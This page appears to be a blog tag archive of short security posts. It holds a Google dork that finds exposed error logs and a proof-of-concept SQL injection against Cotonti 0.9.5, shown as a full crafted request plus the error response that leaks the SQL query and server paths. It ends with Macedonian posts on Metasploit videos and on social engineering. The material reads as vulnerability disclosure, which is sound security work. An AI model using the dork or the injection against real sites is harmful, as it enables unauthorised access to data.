Tag Archive | Exploit

Google hacking part 2


Query: inurl:error_log

Description: It shows error logs from web server.

Advertisements

Cotonti 0.9.5 SQL injection


PoC:

Request:


GET http://localhost/cotonti/index.php?e=search&sq=%5C'%5C'%5C'%5C'%5C'&rs%5Bsetlimit%5D=0&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2010&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2011&rs%5Bsetuser%5D=&rs%5Bpagsub%5D%5B%5D=all&rs%5Bpagtitle%5D=1&rs%5Bpagdesc%5D=1&rs%5Bpagtext%5D=1&rs%5Bpagsort%5D=date&rs%5Bpagsort2%5D=ASC&rs%5Bfrmsub%5D%5B%5D=all&rs%5Bfrmtitle%5D=1&rs%5Bfrmtext%5D=1&rs%5Bfrmsort%5D=updated'INJECTED_PARAM'INJECTED_PARAM&rs%5Bfrmsort2%5D=ASC HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://localhost/cotonti/index.php?e=search&sq=%27%27%27%27%27&rs%5Bsetlimit%5D=0&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2010%271%27&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2011&rs%5Bsetuser%5D=&rs%5Bpagsub%5D%5B%5D=all&rs%5Bpagtitle%5D=1&rs%5Bpagdesc%5D=1&rs%5Bpagtext%5D=1&rs%5Bpagsort%5D=date&rs%5Bpagsort2%5D=ASC&rs%5Bfrmsub%5D%5B%5D=all&rs%5Bfrmtitle%5D=1&rs%5Bfrmtext%5D=1&rs%5Bfrmsort%5D=updated&rs%5Bfrmsort2%5D=ASC
Cookie: PHPSESSID=bnq658i0omp7t3u654i85llj51
Content-length: 0

Response:


Fatal error: SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause'

#0 cot_diefatal(SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause') called at [D:\xampp2\htdocs\cotonti\system\database.php:436]
#1 CotDB->query(SELECT SQL_CALC_FOUND_ROWS p.*, t.*
FROM cot_forum_posts AS p, cot_forum_topics AS t
WHERE t.ft_cat IN ('pub','general','offtopic') AND (t.ft_title LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%' OR p.fp_text LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%') AND p.fp_topicid = t.ft_id
GROUP BY t.ft_id ORDER BY ft_updatedINJECTED_PARAMINJECTED_PARAM ASC
LIMIT 0, 50) called at [D:\xampp2\htdocs\cotonti\plugins\search\search.php:367]
#2 include(D:\xampp2\htdocs\cotonti\plugins\search\search.php) called at [D:\xampp2\htdocs\cotonti\system\plugin.php:94]
#3 require_once(D:\xampp2\htdocs\cotonti\system\plugin.php) called at [D:\xampp2\htdocs\cotonti\index.php:92]

Pen-testing in metasploit на македонски…part 2


Некои видеа што набрзина ги снимив.

Сценарио 01:

Сценарио 02:

Сценарио 03:

Сценарио 04:

п.с не се едитирани, не ми замерувајте 😛

Што претставува Social Engineering (Социјално Инжињерство)?


Социјално Инжињерство претставува искористување и напаѓање на човековиот фактор кој е од психички карактер, кој се извршува преку разни комуникациски измами и лаги преку телефон, електронска пошта, програми за интернет комуникација (одредени програми како IRC ,Skype, MSN и ин.), користејќи ја наивноста на луѓето и нивната доверба со цел добивање на значајни податоци и информации како password(лозинка), корисничко име(User ID), матичен број(Social serial number – SSN) , број на кредитна картичка и разни други информации.